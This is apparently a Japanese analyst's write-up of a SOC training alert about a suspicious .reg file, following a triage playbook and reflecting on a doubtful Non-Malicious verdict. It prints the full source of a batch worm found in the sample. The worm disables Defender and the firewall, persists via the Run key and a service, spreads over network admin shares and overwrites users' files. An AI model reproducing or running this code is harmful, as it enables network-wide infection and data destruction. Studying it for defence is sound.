Details
EventID: 50
Event Time: Feb. 6, 2021, 1:58 p.m.
Rule: SOC117 - Suspicious .reg File
Level: Security Analyst
Source Address 172.16.17.51
Source Hostname Aldo
File Name config.reg
File Hash f705ac114767397fb5e7cd1603e70954
File Size 16.3 MB
Device Action Blocked
Download (Password:infected): f705ac114767397fb5e7cd1603e70954.zip
playbook
Define Threat Indicator
Answer:Other
Check if the malware is quarantined/cleaned
Device Action Blocked
Answer: Quarantined
Analyze Malware
config.reg
VirusTotal: https://www.virustotal.com/gui/file/97d7fc21caf2e830076d8d880bdfe906fae5a4925e6c1012087b764a75989089
HybridAnalysis:https://www.hybrid-analysis.com/sample/97d7fc21caf2e830076d8d880bdfe906fae5a4925e6c1012087b764a75989089
脅威であるようなレポートは無い。
中にはAutorunやStart up Folderに関わるKeyが見つかったが、
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS
コマンドが登録されているならともかく、ファイルが登録されていそうだ。それなら、そのファイルが無ければ問題無いのでは。
importantUpdate.bat
今回のzipファイルには何故か、別のファイルも含まれていた。
VirusTotal: https://www.virustotal.com/gui/file/fc4de26ede0690dbc4ef4ed7ffcc28c086d5c8998f2cbe1e2c3c20516c7da2db
このbatch wormに関しては、説明がstackoverflowに
malware - How this "batch worm" works? - Stack Overflow
ページの中身のテキストだけで、BAT/wormとしてアンチウイルスソフトに検出される。
@echo off
SET i=0
SET "NomeProcesso=DaMonki.exe"
SET "NomeService=DaMonki"
rem <=== run as service ===>
echo sc create %NomeService% binpath=%0 > service.bat
echo sc start %NomeService% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== startup registry ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== kill firewall and windows defender ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== INFECT NETWORK!!! ===>
:Worm
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto Infect) else (set /a i=i+1)
goto Worm
rem <=== infect *.* in C:\Users ===>
:Infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)
自身の自動起動設定を行って、共有ドライブのUsersフォルダ内のStart up Folderに自身を登録して、Usersフォルダ内のファイルを全てimportantUpdate.batに書き換えるようだ。
まさにWorm
importantUpdate.batがMaliciousなので、Maliciousなのだろうか。
今回のアラートはregに対するものでregは、Non-Maliciousであると考えるので
Answer: Non-Malicious
Add Artifacts
| Value | Type | Comment |
|---|---|---|
| f705ac114767397fb5e7cd1603e70954 | MD5 Hash | unknown .reg file |
TPとは言い切れないのでFPではないのかと。
End

ボロボロだ。
regにはAutorunやStart up Folderに関わるものがあったのは怪しいものだったか。他のも怪しいKeyはあったといえばあった。
怪しいならTPぐらいが良かったか。にしてもbatch wormは何だったのか。
一つ文句を言うなら、怪しい.regファイルは怪しく無くとも.regを使うケースの方が珍しいのでそもそもポリシーとして禁止しても良さそうではないか。